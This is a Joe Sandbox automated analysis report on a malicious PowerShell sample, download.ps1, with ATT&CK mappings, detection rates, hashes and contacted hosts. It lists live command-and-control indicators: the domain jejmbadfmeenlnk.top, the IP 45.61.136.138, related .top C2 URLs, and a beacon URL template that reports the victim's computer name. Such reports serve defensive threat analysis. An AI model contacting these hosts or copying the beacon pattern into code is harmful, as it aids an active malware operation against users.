Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps113%VirustotalBrowse
download.ps15%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://jejmbadfmeenlnk.top0%Avira URL Cloudsafe
http://jejmbadfmeenlnk.top/rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=5270%Avira URL Cloudsafe
http://$uvi20ktjcnyw35a/$s15icx0rbfpgmo7.php?id=$env:computername&key=$evzistfw&s=5270%Avira URL Cloudsafe
http://crl.micros_)M0%Avira URL Cloudsafe
http://www.microsoft.coZ0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
jejmbadfmeenlnk.top
45.61.136.138
truetrue
    		unknown
    www.google.com
    		142.250.185.196
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://jejmbadfmeenlnk.top/rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=527true
      • Avira URL Cloud: safe
      		unknown
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F81951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.2155062733.0000024F9006D000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://jejmbadfmeenlnk.toppowershell.exe, 00000000.00000002.2124041725.0000024F81951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F81891000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schema.org/WebPagepowershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F8254B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F82855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F82886000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F82861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F82868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F82538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F826CB000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://0.google.com/powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schema.org/WebPageXpowershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000000.00000002.2155062733.0000024F9006D000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2155062733.0000024F9006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/logos/doodles/2025/president-jimmy-carter-6753651837110135.2-2x.pngXpowershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.google.compowershell.exe, 00000000.00000002.2124041725.0000024F81951000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26sourcepowershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F81B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://apis.google.compowershell.exe, 00000000.00000002.2155062733.0000024F90001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F8196D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F81B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2124041725.0000024F80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2155062733.0000024F9006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.2155062733.0000024F90001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F8196D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://$uvi20ktjcnyw35a/$s15icx0rbfpgmo7.php?id=$env:computername&key=$evzistfw&s=527powershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2124041725.0000024F81891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/Iconpowershell.exe, 00000000.00000002.2155062733.0000024F9006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://0.googlepowershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://0.google.powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://0.google.com/powershell.exe, 00000000.00000002.2124041725.0000024F819BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.2155062733.0000024F90198000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2124041725.0000024F80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.google.com/logos/doodles/2025/president-jimmy-carter-6753651837110135.2-2x.pngpowershell.exe, 00000000.00000002.2124041725.0000024F826CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://crl.micros_)Mpowershell.exe, 00000000.00000002.2164509679.0000024FF4A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.2124041725.0000024F8208F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.microsoft.coZpowershell.exe, 00000000.00000002.2165780693.0000024FF4C70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.2124041725.0000024F80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.2124041725.0000024F81B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        142.250.185.196
                                                                                                        		www.google.comUnited States
                                                                                                        		15169GOOGLEUSfalse
                                                                                                        45.61.136.138
                                                                                                        		jejmbadfmeenlnk.topUnited States
                                                                                                        		40676AS40676UStrue

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1586614
                                                                                                        Start date and time:2025-01-09 12:26:06 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 4m 25s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:6
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:download.ps1
                                                                                                        Detection:MAL
                                                                                                        Classification:mal72.evad.winPS1@2/7@2/2
                                                                                                        EGA Information:Failed
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 89%
                                                                                                        • Number of executed functions: 18
                                                                                                        • Number of non-executed functions: 2
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .ps1

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.253.45, 172.202.163.200
                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 2640 because it is empty
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        06:27:02API Interceptor36x Sleep call for process: powershell.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • canjjclmlnicbga.top/qp49hfdl12htr.php?id=computer&key=36785799113&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • canjjclmlnicbga.top/ujbqd70lwehtr.php?id=user-PC&key=103617095359&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • jjdgdeffjimfgne.top/0ouyalt7pvhtr.php?id=computer&key=66159843360&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • jjdgdeffjimfgne.top/hibqcrnlaehtr.php?id=user-PC&key=124983136495&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • jjdgdeffjimfgne.top/x31t20p8dnhtr.php?id=computer&key=63331330340&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • jjdgdeffjimfgne.top/4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • bfhdkgmmhdbikgj.top/3dy4fnsuzmhtr.php?id=computer&key=40391840945&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • bfhdkgmmhdbikgj.top/gz782b5rhjhtr.php?id=computer&key=73964595488&s=527

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        AS40676US5.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 104.149.140.73
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138
                                                                                                        miori.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 206.201.59.150
                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 45.61.136.138

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64
                                                                                                        Entropy (8bit):1.1940658735648508
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:NlllulPiCllp:NllUaml
                                                                                                        MD5:23CD0F32487D4C39C45260019751EE98
                                                                                                        SHA1:6AD7B5337078F75823A72D2AE378815F12D2BDDE
                                                                                                        SHA-256:B1C6D3B064C65143F28727AC3FF69A42CD9844C70407E599832C5008D6A1C576
                                                                                                        SHA-512:33B63EBADB890E640FE07095F8C5976BF5CDF84D5197787DE585C718CDA3208A48B046A3BCE2039F6AEFCF3900E7F172E124543AD4EC835E5BD900FDAAE4EB91
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:@...e...................................'............@..........

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rt1y5xx.syo.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmosupzc.2hd.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxhfne0e.yux.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmspxqip.05b.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
